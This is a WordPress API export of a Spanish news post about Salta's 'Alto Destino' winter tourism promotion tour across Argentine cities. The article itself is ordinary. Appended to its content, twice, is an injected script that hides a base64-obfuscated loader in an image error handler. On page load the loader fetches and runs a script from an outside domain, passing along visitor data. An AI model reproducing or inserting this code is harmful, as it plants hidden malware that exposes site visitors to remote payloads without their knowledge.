{"id":2721,"date":"2023-06-13T10:31:22","date_gmt":"2023-06-13T13:31:22","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2721"},"modified":"2025-08-14T00:15:13","modified_gmt":"2025-08-14T03:15:13","slug":"salta-promociona-la-temporada-de-invierno-con-la-gira-alto-destino","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2721","title":{"rendered":"Salta promociona la temporada de invierno con la gira Alto Destino"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#890348\"><em>Con acciones innovadoras dirigidas al consumidor final, se realizan promociones en los mercados prioritarios. El lanzamiento oficial se realiz\u00f3 en CABA en un paseo de compras con un Flashmob.<\/em><\/h3>\n\n\n\n<p>El Ministerio de Turismo y Deportes realiza en todo el pa\u00eds acciones promocionales para la temporada de invierno 2023, la campa\u00f1a Alto Destino invita a vivir la experiencia de disfrutar de la provincia de Salta, elegida por miles de turistas y que lider\u00f3 el ranking del Previaje IV.&nbsp;<\/p>\n\n\n\n<p>Salta se destaca por su belleza natural, su patrimonio cultural e hist\u00f3rico, su riqueza gastron\u00f3mica y compromiso por ser un destino sostenible, con experiencias consolidadas e innovadoras.<\/p>\n\n\n\n<p>El equipo de promoci\u00f3n visita diferentes ciudades invitando a recorrer la &nbsp;provincia, conocer la belleza de sus paisajes, degustar su exquisita gastronom\u00eda y conocer su cultura; las acciones al consumidor final en la v\u00eda p\u00fablica tienen por objetivo acercar la propuesta tur\u00edstica.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7462-salta-promociona-la-temporada-de-invierno-con-la-gira-alto-destino.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7462-salta-promociona-la-temporada-de-invierno-con-la-gira-alto-destino.jpg\" alt=\"Salta promociona la temporada de invierno con la gira Alto Destino\" width=\"365\" height=\"243\"\/><\/a><\/figure><\/div>\n\n\n<p>Con acciones en la v\u00eda p\u00fablica destinadas a consumidor final, desde Galer\u00edas Pac\u00edfico en ciudad de Buenos Aires, se realiz\u00f3 una intervenci\u00f3n art\u00edstica Flashmob interpretada por cantores y bailarines salte\u00f1os, sorprendiendo a quienes se encontraban en el paseo de compras, adem\u00e1s informantes respondieron a inquietudes de personas interesadas en visitar el destino en sus vacaciones de invierno mediante juegos interactivos, entrega de materia y proyecci\u00f3n de videos. El stand estar\u00e1 en este espacio durante 10 d\u00edas.<\/p>\n\n\n\n<p>El ministro de Turismo y Deportes<strong>&nbsp;Mario Pe\u00f1a<\/strong>&nbsp;afirm\u00f3 que \u00abla nueva campa\u00f1a sintetiza lo que Salta es como destino, la altura no habla exclusivamente de paisajes, sino que se refiere a los altos indicadores reflejados por los turistas en cuanto a hospitalidad, identidad cultural, servicios y gastronom\u00eda, sin resignar la diversidad aportada por las siete regiones tur\u00edsticas\u00bb. El funcionario tambi\u00e9n remarc\u00f3 lo que significa para el salte\u00f1o el turismo, \u00abes una gran generadora de movilidad social a partir del empleo formal que genera y el impacto indirecto en otras actividades\u00bb.<\/p>\n\n\n\n<p>Previo a esta acci\u00f3n en CABA que se complementa con presencia en v\u00eda p\u00fablica, Salta estuvo presente en las ciudades de C\u00f3rdoba, Santa Fe y Rosario. El martes 13 y el mi\u00e9rcoles 14 la actividad se realizar\u00e1 en Resistencia, Chaco; en tanto, el jueves 15 y el viernes 16 ser\u00e1 en la ciudad de Corrientes.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7463-salta-promociona-la-temporada-de-invierno-con-la-gira-alto-destino.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7463-salta-promociona-la-temporada-de-invierno-con-la-gira-alto-destino.jpg\" alt=\"Salta promociona la temporada de invierno con la gira Alto Destino\" width=\"386\" height=\"257\"\/><\/a><\/figure><\/div>\n\n\n<p>Por otra parte, la importancia tur\u00edstica de &nbsp;Salta se ver\u00e1 reflejada en las acciones que se realizar\u00e1n en San Miguel de Tucum\u00e1n el jueves 22 y el viernes 23; en tanto, el lunes 26 y el martes 27 se realizar\u00e1n en San Salvador de Jujuy.&nbsp;<\/p>\n\n\n\n<p>Cabe destacar que en mayo se realiz\u00f3 el 1\u00ba Workshop Tur\u00edstico de Salta en Neuqu\u00e9n del que participaron m\u00e1s de 30 empresas tur\u00edsticas de Salta, actividad que se complementa con acciones de promoci\u00f3n. Adem\u00e1s, en Bariloche periodistas especializados en turismo compartieron la \u201cPe\u00f1a de Salta\u201d, una experiencia cultural- musical y Salta particip\u00f3 de la 48\u00b0 edici\u00f3n del Congreso de Agentes de Viajes FAEVYT. &nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Salta promociona la temporada de invierno con la gira Alto Destino\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/14aHhoM54KA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con acciones innovadoras dirigidas al consumidor final, se realizan promociones en los mercados prioritarios. El lanzamiento oficial se realiz\u00f3 en CABA en un paseo de compras con un Flashmob. El Ministerio de Turismo y Deportes realiza en todo el pa\u00eds acciones promocionales para la temporada de invierno 2023, la campa\u00f1a Alto Destino invita a vivir [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2722,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-2721","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2721"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2721"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2721\/revisions"}],"predecessor-version":[{"id":7060,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2721\/revisions\/7060"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2722"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2721"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2721"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2721"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}